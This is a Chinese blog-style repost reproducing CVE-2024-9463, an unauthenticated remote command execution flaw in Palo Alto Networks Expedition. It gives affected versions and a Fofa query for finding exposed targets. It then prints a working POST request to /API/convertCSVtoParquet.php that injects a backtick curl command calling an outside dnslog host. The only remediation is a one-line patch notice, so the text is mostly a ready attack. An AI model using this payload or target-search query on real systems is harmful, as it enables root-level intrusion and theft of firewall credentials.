当前位置: 首页 > news >正文

Palo Alto Networks Expedition 远程命令执行漏洞复现(CVE-2024-9463)

news 2025/5/20 19:16:47

0x01 产品描述:

        Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化网络安全策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。

0x02 漏洞描述:

        攻击者可通过简单的漏洞利用读取数据库内容和任意文件,甚至执行系统命令。该漏洞允许未经身份验证的攻击者以root身份执行命令,暴露PAN-OS防火墙的用户名、密码等敏感信息。

0x03 影响版本:

Palo Alto Networks Expedition < 1.2.96

0x04 搜索语句:

Fofa:title="Expedition Project"

0x05 漏洞复现:

POST /API/convertCSVtoParquet.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedram=watchTowr`curl+http://123.ziwh8b.dnslog.cn`

 

 

0x06 修复建议:

厂商已发布补丁 请即时升级

Expedition | Palo Alto Networks


http://www.mrgr.cn/news/52919.html

相关文章:

  • Stereo-seq 中, CID 和 MID 之间的区别
  • 睿港国际移民携手iHouse,推出“买房送日本经营签证”计划,畅享大阪生活
  • repo 命令大全详解(第十一篇 repo init)
  • Digicert SSL证书
  • 自动化工具:Ansible
  • 论文阅读(十六):Deep Residual Learning for Image Recognition
  • k8s部署Kafka集群超详细讲解
  • 软考中级考试入门学习,超详细知识点总结
  • 富格林:可信措施杜绝虚假伎俩
  • Redis——事务
  • 【2023工业图像异常检测文献】DiffusionAD: 基于规范引导单步去噪的扩散模型异常检测方法
  • (11)(2.1.5) Currawong Velocity CAN ESCs(二)
  • MySQL数字函数详细学习要点
  • VCLP使用指南-3.阅读和构建设计(3)
  • ubuntu系统使用Linux版原生微信
  • 市场上几个跨平台开发框架?
  • 盘点慢查询原因及优化方法
  • vue移动端调试工具vConsole
  • 集成方案 | 结合 Microsoft 365 Copilot 与 Docusign,实现 AI 驱动的协议洞察!
  • SpringBoot技术的车辆管理流程自动化